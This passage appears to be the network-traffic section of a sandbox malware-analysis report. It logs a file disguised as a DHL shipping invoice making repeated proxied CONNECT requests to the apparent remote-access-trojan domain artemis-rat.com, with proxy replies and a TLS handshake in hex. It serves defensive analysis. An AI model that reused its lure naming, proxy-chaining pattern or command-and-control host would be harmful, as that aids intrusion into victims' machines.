2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 31 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b
                            Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=8; IE=EDGE"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link href="https://fonts.googleapis.com/css?family=Roboto&display=swap" rel="stylesheet"> <style type="text/css"> body { height: 100%; font-family: Roboto, Helvetica, Arial, sans-serif; color: #6a6a6a; margin: 0; display: flex; align-items: center; justify-content: center; } input[type=date], input[type=email], input[type=number], input[type=password], input[type=search], input[type=tel], input[type=text], input[type=time], input[type=url], select, textarea { color: #262626; vertical-align: baseline; margin: .2em; border-style: solid; border-width: 1px; border-color: #a9a9a9; background-color: #fff;


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            548192.168.2.451845185.162.230.201806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.071381092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.159035921 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            549192.168.2.45092891.134.140.160122176484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.071525097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            550192.168.2.451840104.17.166.210806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.073031902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.160341978 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            551192.168.2.45177945.120.178.19710806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.074161053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.562609911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            552192.168.2.451835172.67.182.153806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.074909925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.161787987 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            553192.168.2.451626117.160.250.132806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.113317966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.534849882 CET303INHTTP/1.1 400 Bad Request
                            Server: openresty
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Content-Type: text/html
                            Content-Length: 154
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            554192.168.2.45187138.162.14.4831286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.114173889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.440953970 CET111INHTTP/1.1 407 Proxy Authentication Required
                            Proxy-Authenticate: Basic realm=""
                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                            Data Ascii: Proxy Authentication Required


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            555192.168.2.451909104.21.102.95806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.117995024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.206320047 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            556192.168.2.451922172.67.25.204806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.121126890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.208432913 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            557192.168.2.45189838.162.29.14431286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.121639967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.502397060 CET111INHTTP/1.1 407 Proxy Authentication Required
                            Proxy-Authenticate: Basic realm=""
                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                            Data Ascii: Proxy Authentication Required


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            558192.168.2.45176054.248.238.110806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.122195005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.405394077 CET116INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Server: nginx
                            Content-Type: text/plain
                            Content-Length: 0
                            Mar 12, 2024 08:37:01.406018019 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 f0 06 1c e1 1e c5 b5 f8 ef 3b 91 b9 7e ef 68 c9 14 7f 25 4e 5c 57 8a 8a 0d b4 a5 b6 51 12 3d 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                            Data Ascii: e;~h%N\WQ=*,+0/$#('=<5/Uartemis-rat.com#
                            Mar 12, 2024 08:37:01.691857100 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 29 66 ff 0a 50 98 e1 15 1d 45 2a 84 35 48 f1 f5 95 22 51 59 20 9f 3b f3 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                            Data Ascii: =9)fPE*5H"QY ;DOWNGRD0000*H010Uartemis-rat.com0240312070904Z260312070904Z010Uartemis-rat.com0"0*H0sr7vM
                            Mar 12, 2024 08:37:01.694534063 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 fd 77 6c 82 6f 2b 38 b3 eb be c3 83 48 bd 9f 15 11 e7 cf 24 5c 5d 12 7d 4d 43 5c 0a cb e8 f8 49 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 51 95 2d b5 3b d6 88 de a8 1a d8 87 e3 0d 19 77 71 99 1e 5a 03
                            Data Ascii: %! wlo+8H$\]}MC\I(Q-;wqZ*liK
                            Mar 12, 2024 08:37:01.975985050 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 ad bc 0d b0 93 19 18 c2 9a e3 88 38 9a a0 87 a7 0b a1 38 da e4 e0 42 59 fc cb cf 98 6a 0c 51 c6 08 9d e4 12 f8 b5 bb 41
                            Data Ascii: (88BYjQA


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            559192.168.2.45181737.187.77.58135746484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.122195005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            560192.168.2.451750202.131.65.110806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.122747898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.429882050 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            561192.168.2.451605222.179.155.9090916484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.122865915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.583722115 CET325INHTTP/1.1 400 Bad Request
                            Server: nginx/1.12.1
                            Date: Tue, 12 Mar 2024 07:37:03 GMT
                            Content-Type: text/html
                            Content-Length: 173
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            562192.168.2.45095659.15.28.7631286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.122992992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.249872923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.266668081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.359409094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:16.332371950 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            563192.168.2.45167345.133.168.8280806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.122998953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            564192.168.2.45182772.210.221.19741456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.123095989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            565192.168.2.45103862.171.131.101448276484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.123157978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.249916077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.266695976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.359424114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:25.359335899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:37.452894926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:49.562289953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:13.562262058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            566192.168.2.45192338.162.22.9131286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.123234034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.426125050 CET111INHTTP/1.1 407 Proxy Authentication Required
                            Proxy-Authenticate: Basic realm=""
                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                            Data Ascii: Proxy Authentication Required


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            567192.168.2.451675103.118.46.17780806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.123765945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            568192.168.2.451852132.148.16.169277186484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.124582052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            569192.168.2.45182651.75.125.20827029
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.124660015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            570192.168.2.451949185.238.228.67806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.125648022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.213639975 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
